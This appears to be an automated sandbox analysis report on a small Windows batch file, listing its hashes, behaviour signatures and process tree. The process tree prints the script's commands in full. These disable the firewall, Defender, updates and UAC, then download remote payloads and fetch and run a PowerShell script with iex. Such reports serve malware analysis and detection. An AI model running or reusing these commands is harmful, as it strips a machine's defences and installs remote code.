Resubmissions
25/05/2023, 14:44
230525-r3514aag52 1025/05/2023, 14:42
230525-r27tasag47 825/05/2023, 14:33
230525-rw2p4abd4t 10Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
25/05/2023, 14:33
Static task
static1
Behavioral task
behavioral1
Sample
Vewy dangerwous.bat
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Vewy dangerwous.bat
Resource
win10v2004-20230220-en
General
-
Target
Vewy dangerwous.bat
-
Size
1KB
-
MD5
8280240db4a4cc8555599df4f6416667
-
SHA1
de4dd7d5e72af49039fae5b2457a8666a40054db
-
SHA256
744ed50836579d0adac6df4943e921aa07e4637ab703bfcc1fabefbcf4957894
-
SHA512
a709308d1a165e93d5275e220cd8a9cb07263021bfcee2ef9d2f70d9e813991916c1a7e7e83b0a9c1ff45f00ec0e8b3a1dbc7f4a8af5ff14fc05e68a2b87c603
Malware Config
Extracted
http://malicious-url.com/malware.ps1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 936 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 268 netsh.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Control Panel\Desktop\Wallpaper = "http://malicious-url.com/wallpaper.jpg" reg.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1880 sc.exe 560 sc.exe 588 sc.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1732 powershell.exe 1200 powershell.exe 936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 936 powershell.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 916 wrote to memory of 268 916 cmd.exe 28 PID 916 wrote to memory of 268 916 cmd.exe 28 PID 916 wrote to memory of 268 916 cmd.exe 28 PID 916 wrote to memory of 1880 916 cmd.exe 29 PID 916 wrote to memory of 1880 916 cmd.exe 29 PID 916 wrote to memory of 1880 916 cmd.exe 29 PID 916 wrote to memory of 516 916 cmd.exe 30 PID 916 wrote to memory of 516 916 cmd.exe 30 PID 916 wrote to memory of 516 916 cmd.exe 30 PID 916 wrote to memory of 560 916 cmd.exe 31 PID 916 wrote to memory of 560 916 cmd.exe 31 PID 916 wrote to memory of 560 916 cmd.exe 31 PID 916 wrote to memory of 564 916 cmd.exe 32 PID 916 wrote to memory of 564 916 cmd.exe 32 PID 916 wrote to memory of 564 916 cmd.exe 32 PID 916 wrote to memory of 588 916 cmd.exe 33 PID 916 wrote to memory of 588 916 cmd.exe 33 PID 916 wrote to memory of 588 916 cmd.exe 33 PID 916 wrote to memory of 1732 916 cmd.exe 34 PID 916 wrote to memory of 1732 916 cmd.exe 34 PID 916 wrote to memory of 1732 916 cmd.exe 34 PID 916 wrote to memory of 1200 916 cmd.exe 35 PID 916 wrote to memory of 1200 916 cmd.exe 35 PID 916 wrote to memory of 1200 916 cmd.exe 35 PID 916 wrote to memory of 936 916 cmd.exe 36 PID 916 wrote to memory of 936 916 cmd.exe 36 PID 916 wrote to memory of 936 916 cmd.exe 36 PID 916 wrote to memory of 1944 916 cmd.exe 37 PID 916 wrote to memory of 1944 916 cmd.exe 37 PID 916 wrote to memory of 1944 916 cmd.exe 37 PID 916 wrote to memory of 1492 916 cmd.exe 38 PID 916 wrote to memory of 1492 916 cmd.exe 38 PID 916 wrote to memory of 1492 916 cmd.exe 38
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Vewy dangerwous.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
PID:268
-
-
C:\Windows\system32\sc.exesc config "WinDefend" start= disabled2⤵
- Launches sc.exe
PID:1880
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f2⤵
- UAC bypass
PID:516
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled2⤵
- Launches sc.exe
PID:560
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f2⤵PID:564
-
-
C:\Windows\system32\sc.exesc config "wscsvc" start= disabled2⤵
- Launches sc.exe
PID:588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest http://www.unforgettable.dk/42.zip -OutFile keylogger.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest http://www.unforgettable.dk/42.zip -OutFile ransomware.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$webClient = New-Object System.Net.WebClient; $webClient.DownloadString('http://malicious-url.com/malware.ps1') | iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "http://malicious-url.com/wallpaper.jpg" /f2⤵
- Sets desktop wallpaper using registry
PID:1944
-
-
C:\Windows\system32\rundll32.exerundll32.exe user32.dll, UpdatePerUserSystemParameters2⤵PID:1492
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4T0DJIDOAGYVO96VD2DK.temp
Filesize7KB
MD5a54a047b5ed844984d37b9ca2bddc031
SHA1616e9067505ccf482faa305b6d42feea3e8329d5
SHA256261da525a052a3bffa902e733ec40219b4734e8dc8870a290a5cfd529f779292
SHA512628608b6665c665aa35c54f2c9d3828f2c8895d466c59a6244f38c6681a6d20988ef994a6190dafee595cabe047cc91a841c1b5e25b25856eba8068394695140
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a54a047b5ed844984d37b9ca2bddc031
SHA1616e9067505ccf482faa305b6d42feea3e8329d5
SHA256261da525a052a3bffa902e733ec40219b4734e8dc8870a290a5cfd529f779292
SHA512628608b6665c665aa35c54f2c9d3828f2c8895d466c59a6244f38c6681a6d20988ef994a6190dafee595cabe047cc91a841c1b5e25b25856eba8068394695140
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a54a047b5ed844984d37b9ca2bddc031
SHA1616e9067505ccf482faa305b6d42feea3e8329d5
SHA256261da525a052a3bffa902e733ec40219b4734e8dc8870a290a5cfd529f779292
SHA512628608b6665c665aa35c54f2c9d3828f2c8895d466c59a6244f38c6681a6d20988ef994a6190dafee595cabe047cc91a841c1b5e25b25856eba8068394695140